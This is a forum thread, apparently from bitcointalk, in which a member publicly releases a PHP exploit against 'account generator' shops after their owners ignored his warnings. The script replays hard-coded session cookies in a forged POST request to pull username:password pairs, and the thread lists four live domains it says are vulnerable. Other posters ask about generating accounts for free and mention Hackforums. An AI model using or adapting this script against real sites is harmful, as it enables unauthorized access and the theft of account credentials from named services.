Author

Topic: Public Announcement for Digital Goods Generator shops. Exploit (Read 1159 times)

sr. member
Activity: 269
Merit: 250
Is it possible with this exploit that people can generate accounts for free?

yeah you can do a lot...

https://bitcointalksearch.org/topic/--1148789
hero member
Activity: 686
Merit: 500
Is it possible with this exploit that people can generate accounts for free?
sr. member
Activity: 269
Merit: 250
I do run the best generator on Hackforums, yep.


alright hit u up a pm
newbie
Activity: 6
Merit: 0
I do run the best generator on Hackforums, yep.
sr. member
Activity: 269
Merit: 250
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took to long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.

You own a shop too?
newbie
Activity: 6
Merit: 0
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took to long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.
sr. member
Activity: 269
Merit: 250
https://bitcointalksearch.org/topic/m.12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?

That version is fixed that I have but seems the owners are too hot headed to ignore me. So here I am.
newbie
Activity: 9
Merit: 0
https://bitcointalksearch.org/topic/m.12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?
sr. member
Activity: 269
Merit: 250
Hey guys so I have been contacting multiple gen shop owners of this exploit but they either become very defensive or just ends up trying to make lies. Then they begin to act very rude to me.

Update: after this announcement owner of script gave up and doesn't know how to fix the script lol

I was very firm about not posting the exploit but due to multiple threats and lies from them I will just be posting it.

Disclaimer: It is not my fault if their site gets hacked as I warned them and they encouraged me to post. So if any owners blame me they already gave me permission to do so.

There is a 2nd exploit that dumps more stuff but that will be kept private for obvious reasons as it would not be allowed to be posted here

Alright so the exploit is a php code that you can host anywhere. Don't bother asking me on how to use this as you must already know what this does and how to use it.

The new owner of this source has been lying to members that this was a v1 exploit but it still works on v2 and the new owner has never updated the source at all! all he did was rename it which can be confirmed by talking to the original owner.

Code:
if($_GET['auth']=="max"){
$url = '';

$options = array(
    'http' => array(
        'method'  => 'POST',
        'header'  =>   "Host:
" .
                "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
" .
                "X-Requested-With: XMLHttpRequest
" .
                "Cookie: ; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6ImxuR21neVJucWE0VXRZYXpGd29WeXc9PSIsInZhbHVlIjoiOG1FM2NheHBGRUVDdE1qK2N4NzR0OGhUK3FxTE1zMEI4SzhmRGhsMHYwK2FEdkZTcjF1VlwvZDVsZE9tVTc0MFZuaHBxR2VxR1VSemdUczQyNjFIdFMxS3o0MzkrMW80Z2ZvOHlyXC9haHlPVT0iLCJtYWMiOiIzMmQ2OTI4MTk3OTI3NjVlYWNiZmFiMmVmNmZkZmQ3MTM0NDY5ZjBmY2RmOTQ1ODM5YTYwNWUzNGIzN2MxNDQzIn0%3D; __utma=191036587.1210061233.1437918069.1437944919.1437986125.3; __utmb=191036587.12.10.1437986125; __utmc=191036587; __utmz=191036587.1437918069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mcdispenser=eyJpdiI6Im1xa1ZJR3ZBMmhxOFE1eEpCSFI3eXc9PSIsInZhbHVlIjoiR2ZqTUZLQU12YWVUQTNkWkRka2U5MU90QUR4WVlJMWdhTWNKdTBTNEMwV0VBc09xOTZKT1RhRXQ1bkc5SVlrS1NkNFh5MlJ6MHBYVjQxcU5pTVwvNXl3PT0iLCJtYWMiOiJhMTRkMTNiNWI0MDM1ZTYxNmNkOGRjYzBiYmFkYjQzNTZhMDI0ZmQzZTE1NDQxYTQ5MTYyYWE4MGQ2ODdkMmIyIn0%3D


",
    ),
);
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$up = json_decode($result);
$user = $up->username;
$pass = $up->password;
if($up->error == 'You may only generate an account once every 3 seconds.'){
echo 'err_3s';
}else{
echo $user . ':' . $pass;
}
}else{
echo "You aren't authorized to use this api!";
}
?>



Current shops exploitable:
premiumgen.xyz
vzngen.net
25cams.com
raidgenerator.com

also any shops you find that use similar source. There is currently only 1 shop I know here that has a fixed source and its not the ones above.
Jump to: